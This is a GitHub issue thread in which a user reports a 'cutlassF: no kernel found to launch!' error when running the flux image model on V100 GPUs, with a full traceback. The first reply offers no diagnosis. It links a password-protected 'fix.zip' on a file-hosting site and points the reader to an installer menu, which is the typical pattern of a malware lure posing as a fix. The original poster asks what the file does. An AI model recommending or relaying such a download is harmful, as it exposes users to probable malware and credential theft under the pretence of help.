### ISSUE TITLE
RuntimeError: cutlassF: no kernel found to launch!

### ISSUE THREAD

**Issue by mgiessing** [black-forest-labs/flux#125]
Hi, I'm getting the following error using:

- RHEL8.9
- Power9 AC922
- 4xV100 32GB GPU
- CUDA Version: 12.3 || Driver Version: 545.23.08 
- Pytorch 2.1.2

```bash
[...]
a cat on the moon
Traceback (most recent call last):
  File "/root/micromamba/envs/flux/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/root/micromamba/envs/flux/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/root/git/flux/src/flux/__main__.py", line 4, in <module>
    app()
  File "/root/git/flux/src/flux/cli.py", line 250, in app
    Fire(main)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/fire/core.py", line 143, in Fire
    component_trace = _Fire(component, args, parsed_flag_args, context, name)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/fire/core.py", line 477, in _Fire
    component, remaining_args = _CallAndUpdateTrace(
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/fire/core.py", line 693, in _CallAndUpdateTrace
    component = fn(*varargs, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/root/git/flux/src/flux/cli.py", line 196, in main
    inp = prepare(t5, clip, x, prompt=opts.prompt)
  File "/root/git/flux/src/flux/sampling.py", line 53, in prepare
    vec = clip(prompt)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/git/flux/src/flux/modules/conditioner.py", line 33, in forward
    outputs = self.hf_module(
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/transformers/models/clip/modeling_clip.py", line 986, in forward
    return self.text_model(
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/transformers/models/clip/modeling_clip.py", line 890, in forward
    encoder_outputs = self.encoder(
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/transformers/models/clip/modeling_clip.py", line 813, in forward
    layer_outputs = encoder_layer(
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/transformers/models/clip/modeling_clip.py", line 548, in forward
    hidden_states, attn_weights = self.self_attn(
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/micromamba/envs/flux/lib/python3.10/site-packages/transformers/models/clip/modeling_clip.py", line 480, in forward
    attn_output = torch.nn.functional.scaled_dot_product_attention(
RuntimeError: cutlassF: no kernel found to launch!
```

Any idea where this might come from? I saw a few issues claiming it might be the incompatibility of V100 with bfloat16...?

Thank you!

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mgiessing** [comment]
What does that file do and what is that fix about?
